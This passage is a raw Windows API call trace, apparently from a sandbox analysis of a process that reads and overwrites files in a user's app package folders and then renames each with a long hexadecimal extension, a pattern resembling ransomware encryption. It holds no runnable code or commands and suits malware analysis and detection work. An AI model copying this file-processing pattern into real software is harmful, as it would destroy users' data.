lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.88D68C686C98CAFD209282D1DA8F7DEEAF1C50951D27F8D4E5D11B6A2C6EAA56") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Microsoft.WindowsCalculator_10.1510.9020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.88D68C686C98CAFD209282D1DA8F7DEEAF1C50951D27F8D4E5D11B6A2C6EAA56" [0120.031] GetProcessHeap () returned 0x600000 [0120.031] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x22e) returned 0x6db920 [0120.032] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x6db920, Length=0x22e, FileInformationClass=0xa) returned 0x0 [0120.035] CloseHandle (hObject=0x320) returned 1 [0120.038] GetProcessHeap () returned 0x600000 [0120.038] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.040] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.066] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.066] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.069] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0120.070] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".FE501B5ACB8FB954EDE2B3975357967E636991C9CD082275B868F83C352ABD60" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.FE501B5ACB8FB954EDE2B3975357967E636991C9CD082275B868F83C352ABD60") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat.FE501B5ACB8FB954EDE2B3975357967E636991C9CD082275B868F83C352ABD60" [0120.070] GetProcessHeap () returned 0x600000 [0120.070] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x196) returned 0x6dbb58 [0120.070] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x6dbb58, Length=0x196, FileInformationClass=0xa) returned 0x0 [0120.074] CloseHandle (hObject=0x320) returned 1 [0120.074] GetProcessHeap () returned 0x600000 [0120.074] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.074] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.123] ReadFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.147] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.152] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0120.153] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".2FED19E81A3D107CBDCE6F70B12DC63F6FE35C2870E9837B26B2183F01BE321E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.2FED19E81A3D107CBDCE6F70B12DC63F6FE35C2870E9837B26B2183F01BE321E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.2FED19E81A3D107CBDCE6F70B12DC63F6FE35C2870E9837B26B2183F01BE321E" [0120.153] GetProcessHeap () returned 0x600000 [0120.153] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x21e) returned 0x311abe8 [0120.153] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x311abe8, Length=0x21e, FileInformationClass=0xa) returned 0x0 [0120.155] CloseHandle (hObject=0x324) returned 1 [0120.155] GetProcessHeap () returned 0x600000 [0120.155] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.158] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.290] WriteFile (in: hFile=0x324, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.291] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.504] WriteFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0120.509] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.550] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.550] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.645] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.646] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.682] WriteFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0120.687] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.785] ReadFile (in: hFile=0x320, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0120.785] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.785] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0120.788] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".57E2BD85905F95FB0D33958D5270AFB0E592F468DCE4E37F82967910FBF77910" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.57E2BD85905F95FB0D33958D5270AFB0E592F468DCE4E37F82967910FBF77910") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.57E2BD85905F95FB0D33958D5270AFB0E592F468DCE4E37F82967910FBF77910" [0120.788] GetProcessHeap () returned 0x600000 [0120.788] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x216) returned 0x63f1e0 [0120.788] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x25fff60, FileInformation=0x63f1e0, Length=0x216, FileInformationClass=0xa) returned 0x0 [0120.792] CloseHandle (hObject=0x31c) returned 1 [0120.793] GetProcessHeap () returned 0x600000 [0120.793] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.795] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.830] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.830] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.831] WriteFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0120.831] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.833] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0120.834] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".1B71E2F21EE7F358A1BF6DE492293A7D3CBBA97929C7B374061F572CB6D8E910" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.1B71E2F21EE7F358A1BF6DE492293A7D3CBBA97929C7B374061F572CB6D8E910") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.1B71E2F21EE7F358A1BF6DE492293A7D3CBBA97929C7B374061F572CB6D8E910" [0120.834] GetProcessHeap () returned 0x600000 [0120.834] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x200) returned 0x3188c20 [0120.834] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x3188c20, Length=0x200, FileInformationClass=0xa) returned 0x0 [0120.836] CloseHandle (hObject=0x320) returned 1 [0120.837] GetProcessHeap () returned 0x600000 [0120.837] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.837] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.866] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.867] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.868] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.868] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.870] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0120.870] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".5A7C3B78873095AD59F85F3DF17A8B35E73CE123EEAFFF0FF8F48F29AE779A47" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.5A7C3B78873095AD59F85F3DF17A8B35E73CE123EEAFFF0FF8F48F29AE779A47") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.5A7C3B78873095AD59F85F3DF17A8B35E73CE123EEAFFF0FF8F48F29AE779A47" [0120.870] GetProcessHeap () returned 0x600000 [0120.870] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x182) returned 0x6b2470 [0120.871] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x6b2470, Length=0x182, FileInformationClass=0xa) returned 0x0 [0120.872] CloseHandle (hObject=0x320) returned 1 [0120.872] GetProcessHeap () returned 0x600000 [0120.872] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.873] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.909] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.909] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.915] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0120.916] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".7B976FDE36647ACB34DC587154F6B2F9C6F334484AC529E8C6BB9B9EB8A3964C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.7B976FDE36647ACB34DC587154F6B2F9C6F334484AC529E8C6BB9B9EB8A3964C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.7B976FDE36647ACB34DC587154F6B2F9C6F334484AC529E8C6BB9B9EB8A3964C" [0120.916] GetProcessHeap () returned 0x600000 [0120.916] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x248) returned 0x6dc300 [0120.916] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x25fff60, FileInformation=0x6dc300, Length=0x248, FileInformationClass=0xa) returned 0x0 [0120.934] CloseHandle (hObject=0x31c) returned 1 [0120.934] GetProcessHeap () returned 0x600000 [0120.934] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.936] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.957] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.957] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.960] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.961] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.961] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0120.962] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".C77F3D6EFF86223EBD04FA2F6BD3874B6A13D1A3F8C9061ADAA2D1BAE409EA40" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.C77F3D6EFF86223EBD04FA2F6BD3874B6A13D1A3F8C9061ADAA2D1BAE409EA40") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.C77F3D6EFF86223EBD04FA2F6BD3874B6A13D1A3F8C9061ADAA2D1BAE409EA40" [0120.962] GetProcessHeap () returned 0x600000 [0120.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x198) returned 0x6dc550 [0120.962] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x25fff60, FileInformation=0x6dc550, Length=0x198, FileInformationClass=0xa) returned 0x0 [0120.963] CloseHandle (hObject=0x31c) returned 1 [0120.963] GetProcessHeap () returned 0x600000 [0120.964] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.965] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0120.998] ReadFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.999] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.003] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0121.003] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".D7C9E951CC25D5C836A0C7C3DE43EEF0A70D3D62FBCF8F2FE68E9123143AD97E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.D7C9E951CC25D5C836A0C7C3DE43EEF0A70D3D62FBCF8F2FE68E9123143AD97E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Microsoft.XboxIdentityProvider_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.D7C9E951CC25D5C836A0C7C3DE43EEF0A70D3D62FBCF8F2FE68E9123143AD97E" [0121.003] GetProcessHeap () returned 0x600000 [0121.003] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x250) returned 0x314e5e8 [0121.003] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x314e5e8, Length=0x250, FileInformationClass=0xa) returned 0x0 [0121.004] CloseHandle (hObject=0x324) returned 1 [0121.005] GetProcessHeap () returned 0x600000 [0121.005] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.005] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.024] ReadFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.025] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.025] WriteFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0121.026] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.027] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, 